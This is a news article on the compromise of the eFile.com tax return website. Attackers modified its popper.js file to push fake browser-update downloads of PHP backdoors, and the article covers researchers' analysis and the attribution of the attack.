IRS form for tax return showing JavaScript malware

Suspected Chinese Threat Actors Infected IRS Authorized Tax Return Website With JavaScript Malware

An Internal Revenue Service (IRS) authorized tax return website was exploited to serve JavaScript malware for several weeks.

The malicious JavaScript code displayed an SSL error message on a fake “network error” page with an ‘update browser’ link that initiated malware download. Clicking the link downloaded two malicious executables, ‘update.exe’ for Chromium browsers and ‘installer.exe’ for Firefox.

Multiple eFile.com users posted on a Reddit thread on March 17 requesting confirmation from other Reddit users whether the network error message was legitimate.

Authorized tax return software compromised using stealthy JavaScript malware

Hackers inserted base64-encoded JavaScript malware code by modifying a Bootstrap add-on ‘popper.js’ (used for displaying tooltips and popovers) and loaded the script on almost every page.

“Someone took the normal and harmless popper.js and added obfuscated JavaScript to connect to infoamanewonliag[.]online,” said SANS Internet Storm Center researcher Dr Johannes Ulrich.

The campaign also leveraged another JavaScript file, ‘update.js’, that displayed the fake SSL error message, which was a base64-encoded string. The file, which was loaded from an Amazon AWS endpoint, also initiated the malware download process.

According to MalwareHunterTeam security researchers, the executable binaries were Windows backdoors written in the PHP programming language.

The PHP scripts persistently executed in the background and connected to a command and control (C2) server every ten seconds to receive an execution command. The malicious PHP scripts supported code execution, file download, and scheduling execution.

Seemingly, the JavaScript malware campaign did not target the tax return software users’ personal information. However, threat actors could leverage the backdoors to maintain persistence, download additional payloads, spread laterally in corporate networks, and steal users’ credentials for subsequent sophisticated attacks.

The JavaScript malware also only targeted the third-party tax return software service, not the official IRS e-file infrastructure. Likely, the hacking campaign intended to capitalize on the stressful tax return season to distribute malware for future attacks.

“Tax filing services and their customers are prime targets for cybercriminals in the peak of their busiest season of the year,” said Zane Bond, Head of Product at Keeper Security. “This is not unexpected as bad actors often leverage significant events to launch their malicious attacks.”

John Bambenek, Principal Threat Hunter at Netenrich, said the presence of a malicious JavaScript file during the stressful tax season was worrying.

“Anything used in filing tax returns is highly sensitive,” he said. “Considering malicious JavaScript was present for an extended period of time, this is quite concerning.”

Bambenek faulted the tax return website operator for failing to detect code modification in production.

“Attackers know that tax fraud is a lucrative business with billions lost annually, and that changes were made to a production website that were not detected, means some basic detections were not present,” noted Bambenek.

Interestingly, only two antivirus engines on Google’s VirusTotal (Crowdstrike Falcon and Cynet) detected the two Windows executables as malicious.

JavaScript malware campaign attributed to a Chinese threat actor

SANS researcher Ulrich discovered that the files were signed with a valid digital certificate from Sichuan Niurui Science and Technology Co., Ltd.

He also noted that the website hosting the malicious executables infoamanewonliag[.]online resolved to a Tokyo, Japan-based IP address, 47.245.6.91, hosted by Alibaba. Similarly, the payloads established connections with the same IP address, suggesting it hosted a C2 server.

The SANS researcher attributed the attack to a Chinese threat actor, who also attempted to remove the JavaScript malware before eFile.com operators cleaned the website.

Given their clumsy but effective hacking plot, this clean-up operation was likely an attempt to cover their tracks and avoid detection.

“Some of the attack infrastructure is hosted with Alibaba in China, and some Chinese comments are in the code. So probably someone Chinese. The code is very cobbled together, and the clumsy inclusion of PHP points to a not-so-advanced, but maybe still persistent, threat actor,” Ulrich suggested.

The tax return website operators have not publicly responded to the attack, and the number of victims is unknown. With approximately 1.1 million people visiting the tax return website and the urgency of filing tax returns, the malware campaign most likely affected a significant number.